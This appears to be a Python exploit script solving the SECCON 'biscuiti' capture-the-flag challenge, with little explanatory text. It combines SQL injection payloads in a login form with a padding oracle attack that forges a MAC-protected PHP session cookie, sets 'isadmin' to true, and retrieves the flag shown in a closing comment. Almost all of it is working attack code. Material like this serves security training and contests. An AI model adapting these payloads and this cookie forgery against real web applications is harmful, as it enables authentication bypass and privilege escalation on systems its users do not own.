Rating:
from Crypto.Util.number import *
from Crypto.Cipher import AES
import requests
import time
import base64
def xor(a, b):
return "".join([chr(ord(a[i]) ^ ord(b[i % len(b)])) for i in xrange(len(a))])
def add_pad(s):
block_len = 16
pad_len = block_len - len(s)
return s + chr(pad_len)*pad_len
def padding_oracle_attack(cipher, plain):
after_dec = ""
for k in range(1, 17):
for i in range(0, 256):
pad = xor(after_dec, chr(k)*(k-1))
iv = "A"*16
c = "A"*(16-k) + chr(i) + pad + cipher
assert len(iv + c) == 48
uname = "' UNION SELECT 'a', '%s" % (base64.b64encode(iv + c))
url = "http://biscuiti.pwn.seccon.jp/"
payload = payload = {"username":uname, "password":""}
r = requests.post(url, data=payload)
if r.text.find("Hello") < 0:
after_dec = chr(i ^ k) + after_dec
print after_dec.encode("hex")
break
assert len(after_dec) == 16
prev_cihper = xor(after_dec, plain)
return prev_cihper
uname = "' UNION SELECT 'aaaaaaaaaaaaaaaaaaaaaaaaaa', 'hoge"
url = "http://biscuiti.pwn.seccon.jp/"
payload = payload = {"username":uname, "password":""}
r = requests.post(url, data=payload)
jsession = r.headers['set-cookie'].split("=")[1].replace("%3D", "=")
u = base64.b64decode(jsession)
j = u[:-16]
mac_j = u[-16:]
P = [j[i: i+16] for i in range(0, len(j), 16)]
C = [""]*5
P[4] = add_pad(P[4])
C[4] = mac_j
for i in reversed(range(1,5)):
C[i-1] = padding_oracle_attack(C[i], P[i])
# C = ["88bb7c4931651cb975e48e9008c1a911".decode("hex"),
# "6106b1d3251bea689f161c65d85705eb".decode("hex"),
# "fc04f5ccfdcfed064cf3200eace65257".decode("hex"),
# "d48fa8585b30d06b5b5515659b5f03d8".decode("hex"),
# "a853d2fb8dc8d23b5bca133bb84039d7".decode("hex")]
P[4] = add_pad("b:1;}")
P[2] = xor(xor(P[4], C[3]), C[1])
uname = "' UNION SELECT 'aaaaaaaaaa%s', 'hoge" % P[2]
url = "http://biscuiti.pwn.seccon.jp/"
payload = payload = {"username":uname, "password":""}
r = requests.post(url, data=payload)
jsession = r.headers['set-cookie'].split("=")[1].replace("%3D", "=")
u = base64.b64decode(jsession)
j = u[:-16]
mac_j = u[-16:]
P = [j[i: i+16] for i in range(0, len(j), 16)]
C = [""]*5
P[4] = add_pad(P[4])
C[4] = mac_j
for i in reversed(range(3,5)):
C[i-1] = padding_oracle_attack(C[i], P[i])
# C[2] = "3d469b651494c9a3289e00191a6bafb6".decode("hex")
jsession = base64.b64encode('a:2:{s:4:"name";s:26:"aaaaaaaaaaaaaaaaaaaaaaaaaa";s:7:"isadmin";b:1;}'+C[2])
url = "http://biscuiti.pwn.seccon.jp/"
header = {"Cookie":"JSESSION=%s" % jsession.replace("=","%3D")}
r = requests.post(url, headers=header)
print r.text
#
# <html>
# <head><title>Login</title></head>
# <body>
# Hello aaaaaaaaaaaaaaaaaaaaaaaaaa
# SECCON{049a65dae9b075ebb68dd78d7c8c300f3b532065}
# <div>Log out</div>
# </body>
# </html>
